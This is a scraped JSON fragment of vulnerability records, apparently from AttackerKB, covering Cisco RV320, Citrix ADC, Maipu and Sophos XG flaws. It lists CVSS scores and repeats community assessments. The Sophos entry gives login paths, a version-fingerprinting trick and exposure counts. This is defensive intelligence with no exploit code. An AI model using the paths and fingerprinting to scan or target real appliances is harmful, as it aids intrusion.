"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-01-24T00:00:00", "type": "attackerkb", "title": "CVE-2019-1653", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1653"], "modified": "2020-10-07T00:00:00", "id": "AKB:D87D8B3A-B6C4-4B59-A2EF-577C30171961", "href": "https://attackerkb.com/topics/O87dIOaTb1/cve-2019-1653", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-01-18T20:32:03", "description": "An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.\n\n \n**Recent assessments:** \n \n**kevthehermit** at February 22, 2020 12:29am UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to exising AMIs\n\n**zeroSteiner** at January 02, 2020 3:42pm UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to exising AMIs\n\n**dmelcher5151** at April 16, 2020 12:56am UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to exising AMIs\n\n**bcook-r7** at January 11, 2020 7:23pm UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to exising AMIs\n\n**hrbrmstr** at May 12, 2020 7:56pm UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to exising AMIs\n\n**gwillcox-r7** at October 20, 2020 5:51pm UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to exising AMIs\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-05T00:00:00", "type": "attackerkb", "title": "CVE-2019-19781", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-07-27T00:00:00", "id": "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65", "href": "https://attackerkb.com/topics/x22buZozYJ/cve-2019-19781", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T17:04:24", "description": "A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands. The vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending malicious HTTP POST requests to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux shell as root. Cisco has released firmware updates that address this vulnerability.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-01-24T00:00:00", "type": "attackerkb", "title": "CVE-2019-1652", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1652"], "modified": "2020-10-07T00:00:00", "id": "AKB:75573626-39F0-4E95-928D-7603C6E049EF", "href": "https://attackerkb.com/topics/xrhLRxWPhw/cve-2019-1652", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-06-20T01:58:34", "description": "The web interface of Maipu MP1800X-50 7.5.3.14\u00ae devices allows remote attackers to obtain sensitive information via the form/formDeviceVerGet URI, such as system id, hardware model, hardware version, bootloader version, software version, software image file, compilation time, and system uptime. This is similar to CVE-2019-1653.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-06-29T00:00:00", "type": "attackerkb", "title": "CVE-2020-13896", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1653", "CVE-2020-13896"], "modified": "2020-07-09T00:00:00", "id": "AKB:028F0B15-BECA-49C5-9195-C76E72BD1A88", "href": "https://attackerkb.com/topics/4o9ol6Hy8R/cve-2020-13896", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-07-22T23:03:33", "description": "A SQL injection issue was found in SFOS 17.0, 17.1, 17.5, and 18.0 before 2020-04-25 on Sophos XG Firewall devices, as exploited in the wild in April 2020. This affected devices configured with either the administration (HTTPS) service or the User Portal exposed on the WAN zone. A successful attack may have caused remote code execution that exfiltrated usernames and hashed passwords for the local device admin(s), portal admins, and user accounts used for remote access (but not external Active Directory or LDAP passwords)\n\n \n**Recent assessments:** \n \n**hrbrmstr** at April 27, 2020 12:34pm UTC reported:\n\n### Vulnerability Rating/Info\n\nI based the value and exploitability off of the Sophos vulnerability details page: <https://community.sophos.com/kb/en-us/135412> / <https://web.archive.org/web/20200426003614/https://community.sophos.com/kb/en-us/135412>\n\nSophos indicates attackers have been actively compromising these appliances at least as of April 22, 2020 when at least one customer noticed odd field values in their admin console.\n\nGiven that the SQL injection can happen pre-auth, and that both the user-facing and admin-facing interfaces are vulnerable, means this is a pretty severe bug.\n\nIt appears to only provide access to usernames and hashed appliance passwords. Credential reuse is likely the culprit for at least the known successful post-SQLi compromise.\n\n### Exposure Analysis\n\nWe found over 72,000 exposed appliances. Many appear to be service provider/telecom/ISP provisioned and sitting on customer segments.\n\nThe top 20 countries (IP geolocation) make up ~80% of the exposure:\n\ncountry | n | pct \n---|---|--- \nUnited States | 9126 | 12.54% \nIndia | 7989 | 10.98% \nGermany | 5433 | 7.47% \nJapan | 4680 | 6.43% \nItaly | 4338 | 5.96% \nAustralia | 4168 | 5.73% \nTurkey | 3740 | 5.14% \nBrazil | 3526 | 4.85% \nFrance | 2567 | 3.53% \nUnited Kingdom | 1822 | 2.50% \nSouth Africa | 1779 | 2.44% \nCanada | 1658 | 2.28% \nSpain | 1644 | 2.26% \nMalaysia | 1496 | 2.06% \nSwitzerland | 1261 | 1.73% \nColombia | 1124 | 1.54% \nThailand | 1087 | 1.49% \nNetherlands | 932 | 1.28% \nTaiwan | 681 | 0.94% \nPortugal | 611 | 0.84% \n \nThere are 2 primary externally facing HTTP paths:\n\n * Admin @ `https://{host|ip}:{port}/webconsole/webpages/login.jsp` \n\n * User @ `https://{host|ip}:{port}/userportal/webpages/myaccount/login.jsp` \n\n\nI crafted a quick hack study to just see if we could get version info and we can. Sophos does the daft thing Microsoft does for OWA and refers to HTML resources by the version/build (e.g.):\n \n \n <link rel=\"stylesheet\"\n href=\"/themes/lite1/css/loginstylesheet.css?ver=17.5.9.577\"\n type=\"text/css\">\n \n\nI\u2019ll be doing a more thorough path study this week but we got back ~12,500 unique (by IP) responses. Here\u2019s the breakdown (TLDR there\u2019s a decent bit of exposure as of Sunday).\n \n \n Sophos XG Appliance Version Distribution \n ~65,000 Appliances Provided Version Details; \n Only ~25% appear to be patched as of 2020-04-27. \n \n # Sophos Appliances \n 0~ 5,000 10,000 15,000\n 5.01.0.376 x ~ ~ ~ \n 5.01.0.407 x ~ ~ ~ \n 5.01.0.418 x ~ ~ ~ \n 5.01.0.447 x ~ ~ ~ \n 6.01.0.190 x ~ ~ ~ \n 6.01.1.202 xx ~ ~ ~ \n 6.01.2.222 x ~ ~ ~ \n 6.01.3.265 x ~ ~ ~ \n 6.01.4.342 x ~ ~ ~ \n 6.05.0.098 x ~ ~ ~ \n 6.05.0.117 x ~ ~ ~ \n 6.05.1.139 x ~ ~ ~ \n 6.05.2.160 xx ~ ~ ~ \n 6.05.3.183 x ~ ~ ~ \n 6.05.5.233 xx ~ ~ ~ \n 6.05.6.266 xx ~ ~ ~ \n 6.05.7.305 xx ~ ~ ~ \n 6.05.8.320 x ~ ~ ~ \n 17.0.0.32 x ~ ~ ~ \n 17.0.0.80 x ~ ~ ~ \n 17.0.1.98 x ~ ~ ~ \n 17.0.2.116 xx ~ ~ ~ \n 17.0.3.131 x ~ ~ ~ \n 17.0.5.162 xx ~ ~ ~ \n 17.0.6.181 xxxxx ~ ~ ~ \n 17.0.7.191 xxxx ~ ~ ~ \n 17.0.8.209 x ~ ~ ~ \n 17.0.9.217 x ~ ~ ~ \n 17.1.0.152 x ~ ~ ~ \n 17.1.1.175 xx ~ ~ ~ \n 17.1.2.225 xxxx ~ ~ ~ \n 17.1.3.250 xxxxx ~ ~ ~ \n 17.5.0.310 x ~ ~ ~ \n 17.5.0.321 xxx ~ ~ ~ \n 17.5.1.347 xxx ~ ~ ~ \n 17.5.2.381 xxxxxxxxxxxxxxxxxxxxxxxxxx ~ ~ \n 17.5.3.372 x ~ ~ ~ \n 17.5.4.429 xxxxxx ~ ~ ~ \n 17.5.5.433 xxxxxxxxx ~ ~ ~ \n 17.5.6.488 xxxxxx ~ ~ ~ \n 17.5.7.511 xxxxxxxxxxxxxxxxxxxxxxxxx ~ ~ \n 17.5.8.539 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ~ \n 7.5.10.620 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ~ \n 7.5.11.661 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ~ \n 18.0.0.102 x ~ ~ ~ \n 18.0.0.113 x ~ ~ ~ \n 18.0.0.180 x ~ ~ ~ \n 18.0.0.285 x ~ ~ ~ \n 18.0.0.321 xx ~ ~ ~ \n 18.0.0.339 xxxxxx ~ ~ ~ \n 18.0.0.354 xx ~ ~ ~ \n 18.0.1.368 x ~ ~ ~ \n ~ Source: Rapid7 Project Sonar April 2020 HTTPS Studies~ \n \n\nAs of 2020-04-28 ~25% appliances do not leave the \u201cauto-update hotfix\u201d setting on.\n\nOur blog on it: <https://blog.rapid7.com/2020/04/27/cve-2020-12271-sophos-xg-firewall-pre-auth-sql-injection-vulnerability-remediation-guidance-and-exposure-overview/> | <https://web.archive.org/web/20200428094002/https://blog.rapid7.com/2020/04/27/cve-2020-12271-sophos-xg-firewall-pre-auth-sql-injection-vulnerability-remediation-guidance-and-exposure-overview/>\n\n**busterb** at April 29, 2020 1:24pm UTC reported:\n\n### Vulnerability Rating/Info\n\nI based the value and exploitability off of the Sophos vulnerability details page: <https://community.sophos.com/kb/en-us/135412> / <https://web.archive.org/web/20200426003614/https://community.sophos.com/kb/en-us/135412>\n\nSophos indicates attackers have been actively compromising these appliances at least as of April 22, 2020 when at least one customer noticed odd field values in their admin console.\n\nGiven that the SQL injection can happen pre-auth, and that both the user-facing and admin-facing interfaces are vulnerable, means this is a pretty severe bug.\n\nIt appears to only provide access to usernames and hashed appliance passwords. Credential reuse is likely the culprit for at least the known successful post-SQLi compromise.\n\n### Exposure Analysis\n\nWe found over 72,000 exposed appliances. Many appear to be service provider/telecom/ISP provisioned and sitting on customer segments.\n\nThe top 20 countries (IP geolocation) make up ~80% of the exposure:\n\ncountry | n | pct \n---|---|--- \nUnited States | 9126 | 12.54% \nIndia | 7989 | 10.98% \nGermany | 5433 | 7.47% \nJapan | 4680 | 6.43% \nItaly | 4338 | 5.96% \nAustralia | 4168 | 5.73% \nTurkey | 3740 | 5.14% \nBrazil | 3526 | 4.85% \nFrance | 2567 | 3.53% \nUnited Kingdom | 1822 | 2.50% \nSouth Africa | 1779 | 2.44% \nCanada | 1658 | 2.28% \nSpain | 1644 | 2.26% \nMalaysia | 1496 | 2.06% \nSwitzerland | 1261 | 1.73% \nColombia | 1124 | 1.54% \nThailand | 1087 | 1.49% \nNetherlands | 932 | 1.28% \nTaiwan | 681 | 0.94% \nPortugal | 611 | 0.84% \n \nThere are 2 primary externally facing HTTP paths:\n\n * Admin @ `https://{host|ip}:{port}/webconsole/webpages/login.jsp` \n\n * User @ `https://{host|ip}:{port}/userportal/webpages/myaccount/login.jsp` \n\n\nI crafted a quick hack study to just see if we could get version info and we can. Sophos does the daft thing Microsoft does for OWA and refers to HTML resources by the version/build (e.g.):\n \n \n <link rel=\"stylesheet\"\n href=\"/themes/lite1/css/loginstylesheet.css?ver=17.5.9.577\"\n type=\"text/css\">\n \n\nI\u2019ll be doing a more thorough path study this week but we got back ~12,500 unique (by IP) responses. Here\u2019s the breakdown (TLDR there\u2019s a decent bit of exposure as of Sunday).\n \n \n Sophos XG Appliance Version Distribution \n ~65,000 Appliances Provided Version Details; \n Only ~25% appear to be patched as of 2020-04-27. \n \n # Sophos Appliances \n 0~ 5,000 10,000 15,000\n 5.01.0.376 x ~ ~ ~ \n 5.01.0.407 x ~ ~ ~ \n 5.01.0.418 x ~ ~ ~ \n 5.01.0.447 x ~ ~ ~ \n 6.01.0.190 x ~ ~ ~ \n 6.01.1.202 xx ~ ~ ~ \n 6.01.2.222 x ~ ~ ~ \n 6.01.3.265 x ~ ~ ~ \n 6.01.4.342 x ~ ~ ~ \n 6.05.0.098 x ~ ~ ~ \n 6.05.0.117 x ~ ~ ~ \n 6.05.1.139 x ~ ~ ~ \n 6.05.2.160 xx ~ ~ ~ \n 6.05.3.183 x ~ ~ ~ \n 6.05.5.233 xx ~ ~ ~ \n 6.05.6.266 xx ~ ~ ~ \n 6.05.7.305 xx ~ ~ ~ \n 6.05.8.320 x ~ ~ ~ \n 17.0.0.32 x ~ ~ ~ \n 17.0.0.80 x ~ ~ ~ \n 17.0.1.98 x ~ ~ ~ \n 17.0.2.116 xx ~ ~ ~ \n 17.0.3.131 x ~ ~ ~ \n 17.0.5.162 xx ~ ~ ~ \n 17.0.6.181 xxxxx ~ ~ ~ \n 17.0.7.191 xxxx ~ ~ ~ \n 17.0.8.209 x ~ ~ ~ \n 17.0.9.217 x ~ ~ ~ \n 17.1.0.152 x ~ ~ ~ \n 17.1.1.175 xx ~ ~ ~ \n 17.1.2.225 xxxx ~ ~ ~ \n 17.1.3.250 xxxxx ~ ~ ~ \n 17.5.0.310 x ~ ~ ~ \n 17.5.0.321 xxx ~ ~ ~ \n 17.5.1.347 xxx ~ ~ ~ \n 17.5.2.381 xxxxxxxxxxxxxxxxxxxxxxxxxx ~ ~ \n 17.5.3.372 x ~ ~ ~ \n 17.5.4.429 xxxxxx ~ ~ ~ \n 17.5.5.433 xxxxxxxxx ~ ~ ~ \n 17.5.6.488 xxxxxx ~ ~ ~ \n 17.5.7.511 xxxxxxxxxxxxxxxxxxxxxxxxx ~ ~ \n 17.5.8.539 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ~ \n 7.5.10.620 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ~ \n 7.5.11.661 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ~ \n 18.0.0.102 x ~ ~ ~ \n 18.0.0.113 x ~ ~ ~ \n 18.0.0.180 x ~ ~ ~ \n 18.0.0.285 x ~ ~ ~ \n 18.0.0.321 xx ~ ~ ~ \n 18.0.0.339 xxxxxx ~ ~ ~ \n 18.0.0.354 xx ~ ~ ~ \n 18.0.1.368 x ~ ~ ~ \n ~ Source: Rapid7 Project Sonar April 2020 HTTPS Studies~ \n \n\nAs of 2020-04-28 ~25% appliances do not leave the \u201cauto-update hotfix\u201d setting on.\n\nOur blog on it: <https://blog.rapid7.com/2020/04/27/cve-2020-12271-sophos-xg-firewall-pre-auth-sql-injection-vulnerability-remediation-guidance-and-exposure-overview/> | <https://web.archive.org/web/20200428094002/https://blog.rapid7.com/2020/04/27/cve-2020-12271-sophos-xg-firewall-pre-auth-sql-injection-vulnerability-remediation-guidance-and-exposure-overview/>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-27T00:00:00", "type": "attackerkb", "title": "CVE-2020-12271: Sophos XG Firewall Pre-Auth SQL Injection Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781", "CVE-2020-12271"], "modified": "2021-03-29T00:00:00", "id": "AKB:75221F03-CFA1-478E-9777-568E523E3272", "href": "https://attackerkb.com/topics/CkJJPr77qk/cve-2020-12271-sophos-xg-firewall-pre-auth-sql-injection-vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-07-10T22:31:12", "description": "Zoho ManageEngine Desktop Central before 10.0.474 allows remote code execution because of deserialization of untrusted data in getChartImage in the FileStorage class. This is related to the CewolfServlet and MDMLogUploaderServlet servlets.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE&qu

This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits

Description

Related